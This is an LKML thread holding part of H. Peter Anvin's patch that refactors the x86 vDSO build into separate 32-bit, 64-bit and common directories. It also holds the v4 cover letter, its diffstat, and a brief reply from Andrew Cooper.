create mode 100644 arch/x86/entry/vdso/vdso64/Makefile
create mode 100644 arch/x86/entry/vdso/vdso64/note.S
create mode 100644 arch/x86/entry/vdso/vdso64/vclock_gettime.c
rename arch/x86/entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} (94%)
rename arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S (92%)
create mode 100644 arch/x86/entry/vdso/vdso64/vgetcpu.c
rename arch/x86/entry/vdso/{ => vdso64}/vgetrandom-chacha.S (100%)
rename arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c (91%)
rename arch/x86/entry/vdso/{ => vdso64}/vsgx.S (100%)
diff --git a/arch/x86/entry/vdso/Makefile b/arch/x86/entry/vdso/Makefile
index 3d9b09f00c70..987b43fd4cd3 100644
--- a/arch/x86/entry/vdso/Makefile
+++ b/arch/x86/entry/vdso/Makefile
@@ -3,159 +3,10 @@
# Building vDSO images for x86.
#
-# Include the generic Makefile to check the built vDSO:
-include $(srctree)/lib/vdso/Makefile.include
+# Regular kernel objects
+obj-y := vma.o extable.o
+obj-$(CONFIG_COMPAT_32) += vdso32-setup.o
-# Files to link into the vDSO:
-vobjs-y := vdso-note.o vclock_gettime.o vgetcpu.o vgetrandom.o vgetrandom-chacha.o
-vobjs32-y := vdso32/note.o vdso32/system_call.o vdso32/sigreturn.o
-vobjs32-y += vdso32/vclock_gettime.o vdso32/vgetcpu.o
-vobjs-$(CONFIG_X86_SGX) += vsgx.o
-
-# Files to link into the kernel:
-obj-y += vma.o extable.o
-
-# vDSO images to build:
-obj-$(CONFIG_X86_64) += vdso64-image.o
-obj-$(CONFIG_X86_X32_ABI) += vdsox32-image.o
-obj-$(CONFIG_COMPAT_32) += vdso32-image.o vdso32-setup.o
-
-vobjs := $(addprefix $(obj)/, $(vobjs-y))
-vobjs32 := $(addprefix $(obj)/, $(vobjs32-y))
-
-$(obj)/vdso.o: $(obj)/vdso.so
-
-targets += vdso.lds $(vobjs-y)
-targets += vdso32/vdso32.lds $(vobjs32-y)
-
-targets += $(foreach x, 64 x32 32, vdso-image-$(x).c vdso$(x).so vdso$(x).so.dbg)
-
-CPPFLAGS_vdso.lds += -P -C
-
-VDSO_LDFLAGS_vdso.lds = -m elf_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-$(obj)/vdso64.so.dbg: $(obj)/vdso.lds $(vobjs) FORCE
- $(call if_changed,vdso_and_check)
-
-VDSO2C = $(objtree)/arch/x86/tools/vdso2c
-
-quiet_cmd_vdso2c = VDSO2C $@
- cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
-
-$(obj)/vdso%-image.c: $(obj)/vdso%.so.dbg $(obj)/vdso%.so $(VDSO2C) FORCE
- $(call if_changed,vdso2c)
-
-#
-# Don't omit frame pointers for ease of userspace debugging, but do
-# optimize sibling calls.
-#
-CFL := $(PROFILING) -mcmodel=small -fPIC -O2 -fasynchronous-unwind-tables -m64 \
- $(filter -g%,$(KBUILD_CFLAGS)) -fno-stack-protector \
- -fno-omit-frame-pointer -foptimize-sibling-calls \
- -DDISABLE_BRANCH_PROFILING -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- CFL += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(vobjs): KBUILD_CFLAGS := $(filter-out $(PADDING_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) $(RANDSTRUCT_CFLAGS) $(KSTACK_ERASE_CFLAGS) $(GCC_PLUGINS_CFLAGS) $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS)) $(CFL)
-$(vobjs): KBUILD_AFLAGS += -DBUILD_VDSO
-
-#
-# vDSO code runs in userspace and -pg doesn't help with profiling anyway.
-#
-CFLAGS_REMOVE_vclock_gettime.o = -pg
-CFLAGS_REMOVE_vdso32/vclock_gettime.o = -pg
-CFLAGS_REMOVE_vgetcpu.o = -pg
-CFLAGS_REMOVE_vdso32/vgetcpu.o = -pg
-CFLAGS_REMOVE_vsgx.o = -pg
-CFLAGS_REMOVE_vgetrandom.o = -pg
-
-#
-# X32 processes use x32 vDSO to access 64bit kernel data.
-#
-# Build x32 vDSO image:
-# 1. Compile x32 vDSO as 64bit.
-# 2. Convert object files to x32.
-# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
-# so that it can reach 64bit address space with 64bit pointers.
-#
-
-CPPFLAGS_vdsox32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdsox32.lds = -m elf32_x86_64 -soname linux-vdso.so.1 \
- -z max-page-size=4096
-
-# x32-rebranded versions
-vobjx32s-y := $(vobjs-y:.o=-x32.o)
-
-# same thing, but in the output directory
-vobjx32s := $(addprefix $(obj)/, $(vobjx32s-y))
-
-# Convert 64bit object file to x32 for x32 vDSO.
-quiet_cmd_x32 = X32 $@
- cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
-
-$(obj)/%-x32.o: $(obj)/%.o FORCE
- $(call if_changed,x32)
-
-targets += vdsox32.lds $(vobjx32s-y)
-
-$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
-$(obj)/%.so: $(obj)/%.so.dbg FORCE
- $(call if_changed,objcopy)
-
-$(obj)/vdsox32.so.dbg: $(obj)/vdsox32.lds $(vobjx32s) FORCE
- $(call if_changed,vdso_and_check)
-
-CPPFLAGS_vdso32/vdso32.lds = $(CPPFLAGS_vdso.lds)
-VDSO_LDFLAGS_vdso32.lds = -m elf_i386 -soname linux-gate.so.1
-
-KBUILD_AFLAGS_32 := $(filter-out -m64,$(KBUILD_AFLAGS)) -DBUILD_VDSO
-$(obj)/vdso32.so.dbg: KBUILD_AFLAGS = $(KBUILD_AFLAGS_32)
-$(obj)/vdso32.so.dbg: asflags-$(CONFIG_X86_64) += -m32
-
-KBUILD_CFLAGS_32 := $(filter-out -m64,$(KBUILD_CFLAGS))
-KBUILD_CFLAGS_32 := $(filter-out -mcmodel=kernel,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -fno-pic,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out -mfentry,$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RANDSTRUCT_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(KSTACK_ERASE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(GCC_PLUGINS_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(RETPOLINE_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_LTO),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(CC_FLAGS_CFI),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 := $(filter-out $(PADDING_CFLAGS),$(KBUILD_CFLAGS_32))
-KBUILD_CFLAGS_32 += -m32 -msoft-float -mregparm=0 -fpic
-KBUILD_CFLAGS_32 += -fno-stack-protector
-KBUILD_CFLAGS_32 += $(call cc-option, -foptimize-sibling-calls)
-KBUILD_CFLAGS_32 += -fno-omit-frame-pointer
-KBUILD_CFLAGS_32 += -DDISABLE_BRANCH_PROFILING
-KBUILD_CFLAGS_32 += -DBUILD_VDSO
-
-ifdef CONFIG_MITIGATION_RETPOLINE
-ifneq ($(RETPOLINE_VDSO_CFLAGS),)
- KBUILD_CFLAGS_32 += $(RETPOLINE_VDSO_CFLAGS)
-endif
-endif
-
-$(obj)/vdso32.so.dbg: KBUILD_CFLAGS = $(KBUILD_CFLAGS_32)
-
-$(obj)/vdso32.so.dbg: $(obj)/vdso32/vdso32.lds $(vobjs32) FORCE
- $(call if_changed,vdso_and_check)
-
-#
-# The DSO images are built using a special linker script.
-#
-quiet_cmd_vdso = VDSO $@
- cmd_vdso = $(LD) -o $@ \
- $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$(filter %.lds,$(^F))) \
- -T $(filter %.lds,$^) $(filter %.o,$^)
-
-VDSO_LDFLAGS = -shared --hash-style=both --build-id=sha1 --no-undefined \
- $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
-
-quiet_cmd_vdso_and_check = VDSO $@
- cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+# vDSO directories
+obj-$(CONFIG_X86_64) += vdso64/
+obj-$(CONFIG_COMPAT_32) += vdso32/
diff --git a/arch/x86/entry/vdso/common/Makefile.include b/arch/x86/entry/vdso/common/Makefile.include
new file mode 100644
index 000000000000..3514b4a6869b
--- /dev/null
+++ b/arch/x86/entry/vdso/common/Makefile.include
@@ -0,0 +1,89 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# Building vDSO images for x86.
+#
+
+# Include the generic Makefile to check the built vDSO:
+include $(srctree)/lib/vdso/Makefile.include
+
+obj-y += $(foreach x,$(vdsos-y),vdso$(x)-image.o)
+
+targets += $(foreach x,$(vdsos-y),vdso$(x)-image.c vdso$(x).so vdso$(x).so.dbg vdso$(x).lds)
+targets += $(vobjs-y)
+
+# vobjs-y with $(obj)/ prepended
+vobjs := $(addprefix $(obj)/,$(vobjs-y))
+
+# Options for vdso*.lds
+CPPFLAGS_VDSO_LDS := -P -C -I$(src)/..
+$(obj)/%.lds : KBUILD_CPPFLAGS += $(CPPFLAGS_VDSO_LDS)
+
+#
+# Options from KBUILD_[AC]FLAGS that should *NOT* be kept
+#
+flags-remove-y += \
+ -D__KERNEL__ -mcmodel=kernel -mregparm=3 \
+ -fno-pic -fno-PIC -fno-pie fno-PIE \
+ -mfentry -pg \
+ $(RANDSTRUCT_CFLAGS) $(GCC_PLUGIN_CFLAGS) $(KSTACK_ERASE_CFLAGS) \
+ $(RETPOLINE_CFLAGS) $(CC_FLAGS_LTO) $(CC_FLAGS_CFI) \
+ $(PADDING_CFLAGS)
+
+#
+# Don't omit frame pointers for ease of userspace debugging, but do
+# optimize sibling calls.
+#
+flags-y += -D__DISABLE_EXPORTS
+flags-y += -DDISABLE_BRANCH_PROFILING
+flags-y += -DBUILD_VDSO
+flags-y += -I$(src)/.. -I$(srctree)
+flags-y += -O2 -fpic
+flags-y += -fno-stack-protector
+flags-y += -fno-omit-frame-pointer
+flags-y += -foptimize-sibling-calls
+flags-y += -fasynchronous-unwind-tables
+
+# Reset cf protections enabled by compiler default
+flags-y += $(call cc-option, -fcf-protection=none)
+flags-$(X86_USER_SHADOW_STACK) += $(call cc-option, -fcf-protection=return)
+# When user space IBT is supported, enable this.
+# flags-$(CONFIG_USER_IBT) += $(call cc-option, -fcf-protection=branch)
+
+flags-$(CONFIG_MITIGATION_RETPOLINE) += $(RETPOLINE_VDSO_CFLAGS)
+
+# These need to be conditional on $(vobjs) as they do not apply to
+# the output vdso*-image.o files which are standard kernel objects.
+$(vobjs) : KBUILD_AFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_AFLAGS)) $(flags-y)
+$(vobjs) : KBUILD_CFLAGS := \
+ $(filter-out $(flags-remove-y),$(KBUILD_CFLAGS)) $(flags-y)
+
+#
+# The VDSO images are built using a special linker script.
+#
+VDSO_LDFLAGS := -shared --hash-style=both --build-id=sha1 --no-undefined \
+ $(call ld-option, --eh-frame-hdr) -Bsymbolic -z noexecstack
+
+quiet_cmd_vdso = VDSO $@
+ cmd_vdso = $(LD) -o $@ \
+ $(VDSO_LDFLAGS) $(VDSO_LDFLAGS_$*) \
+ -T $(filter %.lds,$^) $(filter %.o,$^)
+quiet_cmd_vdso_and_check = VDSO $@
+ cmd_vdso_and_check = $(cmd_vdso); $(cmd_vdso_check)
+
+$(obj)/vdso%.so.dbg: $(obj)/vdso%.lds FORCE
+ $(call if_changed,vdso_and_check)
+
+$(obj)/%.so: OBJCOPYFLAGS := -S --remove-section __ex_table
+$(obj)/%.so: $(obj)/%.so.dbg FORCE
+ $(call if_changed,objcopy)
+
+VDSO2C = $(objtree)/arch/x86/tools/vdso2c
+
+quiet_cmd_vdso2c = VDSO2C $@
+ cmd_vdso2c = $(VDSO2C) $< $(<:%.dbg=%) $@
+
+$(obj)/%-image.c: $(obj)/%.so.dbg $(obj)/%.so $(VDSO2C) FORCE
+ $(call if_changed,vdso2c)
+
+$(obj)/%-image.o: $(obj)/%-image.c
diff --git a/arch/x86/entry/vdso/vdso-note.S b/arch/x86/entry/vdso/common/note.S
similarity index 62%
rename from arch/x86/entry/vdso/vdso-note.S
rename to arch/x86/entry/vdso/common/note.S
index 79423170118f..2cbd39939dc6 100644
--- a/arch/x86/entry/vdso/vdso-note.S
+++ b/arch/x86/entry/vdso/common/note.S
@@ -1,13 +1,16 @@
+/* SPDX-License-Identifier: GPL-2.0 */
/*
* This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
* Here we can supply some information useful to userland.
*/
#include <linux/build-salt.h>
-#include <linux/uts.h>
#include <linux/version.h>
#include <linux/elfnote.h>
+/* Ideally this would use UTS_NAME, but using a quoted string here
+ doesn't work. Remember to change this when changing the
+ kernel's name. */
ELFNOTE_START(Linux, 0, "a")
.long LINUX_VERSION_CODE
ELFNOTE_END
diff --git a/arch/x86/entry/vdso/vclock_gettime.c b/arch/x86/entry/vdso/common/vclock_gettime.c
similarity index 100%
rename from arch/x86/entry/vdso/vclock_gettime.c
rename to arch/x86/entry/vdso/common/vclock_gettime.c
diff --git a/arch/x86/entry/vdso/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
similarity index 100%
rename from arch/x86/entry/vdso/vdso-layout.lds.S
rename to arch/x86/entry/vdso/common/vdso-layout.lds.S
diff --git a/arch/x86/entry/vdso/vgetcpu.c b/arch/x86/entry/vdso/common/vgetcpu.c
similarity index 100%
rename from arch/x86/entry/vdso/vgetcpu.c
rename to arch/x86/entry/vdso/common/vgetcpu.c
diff --git a/arch/x86/entry/vdso/vdso32/Makefile b/arch/x86/entry/vdso/vdso32/Makefile
new file mode 100644
index 000000000000..add6afb484ba
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso32/Makefile
@@ -0,0 +1,24 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 32-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += system_call.o sigreturn.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO32 -m32 -mregparm=0
+flags-$(CONFIG_X86_64) += -include $(src)/fake_32bit_build.h
+flags-remove-y := -m64
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+# Linker options for the vdso
+VDSO_LDFLAGS_32 := -m elf_i386 -soname linux-gate.so.1
+
+$(obj)/vdso32.so.dbg: $(vobjs)
diff --git a/arch/x86/entry/vdso/vdso32/note.S b/arch/x86/entry/vdso/vdso32/note.S
index 2cbd39939dc6..62d8aa51ce99 100644
--- a/arch/x86/entry/vdso/vdso32/note.S
+++ b/arch/x86/entry/vdso/vdso32/note.S
@@ -1,18 +1 @@
-/* SPDX-License-Identifier: GPL-2.0 */
-/*
- * This supplies .note.* sections to go into the PT_NOTE inside the vDSO text.
- * Here we can supply some information useful to userland.
- */
-
-#include <linux/build-salt.h>
-#include <linux/version.h>
-#include <linux/elfnote.h>
-
-/* Ideally this would use UTS_NAME, but using a quoted string here
- doesn't work. Remember to change this when changing the
- kernel's name. */
-ELFNOTE_START(Linux, 0, "a")
- .long LINUX_VERSION_CODE
-ELFNOTE_END
-
-BUILD_SALT
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso32/system_call.S b/arch/x86/entry/vdso/vdso32/system_call.S
index d33c6513fd2c..2a15634bbe75 100644
--- a/arch/x86/entry/vdso/vdso32/system_call.S
+++ b/arch/x86/entry/vdso/vdso32/system_call.S
@@ -52,7 +52,7 @@ __kernel_vsyscall:
#define SYSENTER_SEQUENCE "movl %esp, %ebp; sysenter"
#define SYSCALL_SEQUENCE "movl %ecx, %ebp; syscall"
-#ifdef CONFIG_X86_64
+#ifdef BUILD_VDSO32_64
/* If SYSENTER (Intel) or SYSCALL32 (AMD) is available, use it. */
ALTERNATIVE_2 "", SYSENTER_SEQUENCE, X86_FEATURE_SYSENTER32, \
SYSCALL_SEQUENCE, X86_FEATURE_SYSCALL32
diff --git a/arch/x86/entry/vdso/vdso32/vclock_gettime.c b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
index 86981decfea8..1481f0021b9f 100644
--- a/arch/x86/entry/vdso/vdso32/vclock_gettime.c
+++ b/arch/x86/entry/vdso/vdso32/vclock_gettime.c
@@ -1,4 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#define BUILD_VDSO32
-#include "fake_32bit_build.h"
-#include "../vclock_gettime.c"
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso32/vdso32.lds.S b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
index 8a3be07006bb..8a853543fc0d 100644
--- a/arch/x86/entry/vdso/vdso32/vdso32.lds.S
+++ b/arch/x86/entry/vdso/vdso32/vdso32.lds.S
@@ -11,7 +11,7 @@
#define BUILD_VDSO32
-#include "../vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/* The ELF entry point can be used to set the AT_SYSINFO value. */
ENTRY(__kernel_vsyscall);
diff --git a/arch/x86/entry/vdso/vdso32/vgetcpu.c b/arch/x86/entry/vdso/vdso32/vgetcpu.c
index 3a9791f5e998..00cc8325a020 100644
--- a/arch/x86/entry/vdso/vdso32/vgetcpu.c
+++ b/arch/x86/entry/vdso/vdso32/vgetcpu.c
@@ -1,3 +1 @@
-// SPDX-License-Identifier: GPL-2.0
-#include "fake_32bit_build.h"
-#include "../vgetcpu.c"
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vdso64/Makefile b/arch/x86/entry/vdso/vdso64/Makefile
new file mode 100644
index 000000000000..bfffaf1aeecc
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/Makefile
@@ -0,0 +1,46 @@
+# SPDX-License-Identifier: GPL-2.0
+#
+# 64-bit vDSO images for x86.
+#
+
+# The vDSOs built in this directory
+vdsos-y := 64
+vdsos-$(CONFIG_X86_X32_ABI) += x32
+
+# Files to link into the vDSO:
+vobjs-y := note.o vclock_gettime.o vgetcpu.o
+vobjs-y += vgetrandom.o vgetrandom-chacha.o
+vobjs-$(CONFIG_X86_SGX) += vsgx.o
+
+# Compilation flags
+flags-y := -DBUILD_VDSO64 -m64 -mcmodel=small
+
+# The location of this include matters!
+include $(src)/../common/Makefile.include
+
+#
+# X32 processes use x32 vDSO to access 64bit kernel data.
+#
+# Build x32 vDSO image:
+# 1. Compile x32 vDSO as 64bit.
+# 2. Convert object files to x32.
+# 3. Build x32 VDSO image with x32 objects, which contains 64bit codes
+# so that it can reach 64bit address space with 64bit pointers.
+#
+
+# Convert 64bit object file to x32 for x32 vDSO.
+quiet_cmd_x32 = X32 $@
+ cmd_x32 = $(OBJCOPY) -O elf32-x86-64 $< $@
+
+$(obj)/%-x32.o: $(obj)/%.o FORCE
+ $(call if_changed,x32)
+
+vobjsx32 = $(patsubst %.o,%-x32.o,$(vobjs))
+targets += $(patsubst %.o,%-x32.o,$(vobjs-y))
+
+# Linker options for the vdso
+VDSO_LDFLAGS_64 := -m elf_x86_64 -soname linux-vdso.so.1 -z max-page-size=4096
+VDSO_LDFLAGS_x32 := $(subst elf_x86_64,elf32_x86_64,$(VDSO_LDFLAGS_64))
+
+$(obj)/vdso64.so.dbg: $(vobjs)
+$(obj)/vdsox32.so.dbg: $(vobjsx32)
diff --git a/arch/x86/entry/vdso/vdso64/note.S b/arch/x86/entry/vdso/vdso64/note.S
new file mode 100644
index 000000000000..62d8aa51ce99
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/note.S
@@ -0,0 +1 @@
+#include "common/note.S"
diff --git a/arch/x86/entry/vdso/vdso64/vclock_gettime.c b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
new file mode 100644
index 000000000000..1481f0021b9f
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vclock_gettime.c
@@ -0,0 +1 @@
+#include "common/vclock_gettime.c"
diff --git a/arch/x86/entry/vdso/vdso.lds.S b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
similarity index 94%
rename from arch/x86/entry/vdso/vdso.lds.S
rename to arch/x86/entry/vdso/vdso64/vdso64.lds.S
index 0bab5f4af6d1..5ce3f2b6373a 100644
--- a/arch/x86/entry/vdso/vdso.lds.S
+++ b/arch/x86/entry/vdso/vdso64/vdso64.lds.S
@@ -9,7 +9,7 @@
#define BUILD_VDSO64
-#include "vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/*
* This controls what userland symbols we export from the vDSO.
diff --git a/arch/x86/entry/vdso/vdsox32.lds.S b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
similarity index 92%
rename from arch/x86/entry/vdso/vdsox32.lds.S
rename to arch/x86/entry/vdso/vdso64/vdsox32.lds.S
index 16a8050a4fb6..3dbd20c8dacc 100644
--- a/arch/x86/entry/vdso/vdsox32.lds.S
+++ b/arch/x86/entry/vdso/vdso64/vdsox32.lds.S
@@ -9,7 +9,7 @@
#define BUILD_VDSOX32
-#include "vdso-layout.lds.S"
+#include "common/vdso-layout.lds.S"
/*
* This controls what userland symbols we export from the vDSO.
diff --git a/arch/x86/entry/vdso/vdso64/vgetcpu.c b/arch/x86/entry/vdso/vdso64/vgetcpu.c
new file mode 100644
index 000000000000..00cc8325a020
--- /dev/null
+++ b/arch/x86/entry/vdso/vdso64/vgetcpu.c
@@ -0,0 +1 @@
+#include "common/vgetcpu.c"
diff --git a/arch/x86/entry/vdso/vgetrandom-chacha.S b/arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
similarity index 100%
rename from arch/x86/entry/vdso/vgetrandom-chacha.S
rename to arch/x86/entry/vdso/vdso64/vgetrandom-chacha.S
diff --git a/arch/x86/entry/vdso/vgetrandom.c b/arch/x86/entry/vdso/vdso64/vgetrandom.c
similarity index 91%
rename from arch/x86/entry/vdso/vgetrandom.c
rename to arch/x86/entry/vdso/vdso64/vgetrandom.c
index 430862b8977c..6a95d36b12d9 100644
--- a/arch/x86/entry/vdso/vgetrandom.c
+++ b/arch/x86/entry/vdso/vdso64/vgetrandom.c
@@ -4,7 +4,7 @@
*/
#include <linux/types.h>
-#include "../../../../lib/vdso/getrandom.c"
+#include "lib/vdso/getrandom.c"
ssize_t __vdso_getrandom(void *buffer, size_t len, unsigned int flags, void *opaque_state, size_t opaque_len)
{
diff --git a/arch/x86/entry/vdso/vsgx.S b/arch/x86/entry/vdso/vdso64/vsgx.S
similarity index 100%
rename from arch/x86/entry/vdso/vsgx.S
rename to arch/x86/entry/vdso/vdso64/vsgx.S
--
2.52.0
|
{
"author": "\"H. Peter Anvin\" <hpa@zytor.com>",
"date": "Tue, 6 Jan 2026 13:18:36 -0800",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
On 06/01/2026 9:18 pm, H. Peter Anvin wrote:
The v4/v4.1 notes will presumably want dropping before committing?
|
{
"author": "Andrew Cooper <andrew.cooper3@citrix.com>",
"date": "Wed, 7 Jan 2026 12:10:52 +0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Biszjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Biszjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
